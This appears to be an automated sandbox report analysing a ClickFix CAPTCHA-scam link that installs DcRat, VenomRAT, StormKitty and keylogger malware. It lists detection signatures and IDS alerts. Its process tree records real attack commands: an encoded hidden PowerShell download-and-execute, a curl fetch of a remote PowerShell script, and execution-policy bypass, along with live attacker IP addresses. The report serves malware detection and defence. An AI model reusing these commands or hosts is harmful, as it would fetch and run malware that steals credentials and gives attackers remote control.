Windows
Analysis Report
https://gogl.to/3HGT
Overview
Detection
CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected BrowserPasswordDump
Yara detected CAPTCHA Scam ClickFix
Yara detected DcRat
Yara detected Keylogger Generic
Yara detected StormKitty Stealer
Yara detected VenomRAT
AI detected suspicious Javascript
AI detected suspicious URL
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powerup Write Hijack DLL
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64_ra
- chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 5912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1684,i,15715468711808837882,6335380214044972637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gogl.to/3HGT" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 6564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 6256 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdAByAHcAcwBmAGcALgBwAHMAMQAgAHwAIABpAGUAeAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7868 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 7028 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- curl.exe (PID: 7064 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- powershell.exe (PID: 7044 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -" MD5: 04029E121A0CFA5991749937DD22A1D9)
- csc.exe (PID: 8056 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40kpnqa1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 8076 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3634.tmp" "c:\Users\user\AppData\Local\Temp\CSC689F54C53B214364B77AA6CD35DA52CB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- RegAsm.exe (PID: 8180 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution
---|---|---
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution
404 Keylogger, 404KeyLogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution
Cameleon, StormKitty | PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands. | No Attribution
Rule | Description | Author
---|---|---
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ClickFix | Joe Security
JoeSecurity_VenomRAT | Yara detected VenomRAT | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_BrowserPasswordDump_1 | Yara detected BrowserPasswordDump | Joe Security
JoeSecurity_Keylogger_Generic_3 | Yara detected Keylogger Generic | Joe Security
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ClickFix | Joe Security
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ClickFix | Joe Security
Sigma rule matches by category (rule authors as listed in the report; source details were not extracted):

- System Summary: Subhash Popuri (@pbssubhash); frack113; Florian Roth (Nextron Systems), X__Junior (Nextron Systems); frack113, Nasreddine Bencherchali (Nextron Systems); frack113; James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; frack113; Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); vburov
- Data Obfuscation: Joe Security (two rules)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
---|---|---|---|---|---|---|---|---
2024-12-31T01:27:28.017986+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 157.20.182.177 | 4449 | 192.168.2.16 | 50030 | TCP
2024-12-31T01:27:14.125579+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.16 | 50012 | 185.149.146.164 | 80 | TCP
Signature results by category (evidence sources as listed in the report; the matched values were not extracted):

- AV Detection: Avira; Joe Sandbox ML
- Phishing: File source (3); Joe Sandbox AI (5); HTTP Parser (9); HTTPS traffic detected (4); File opened (6)
- Software Vulnerabilities: Child process
- Networking: Suricata IDS (2); HTTP traffic detected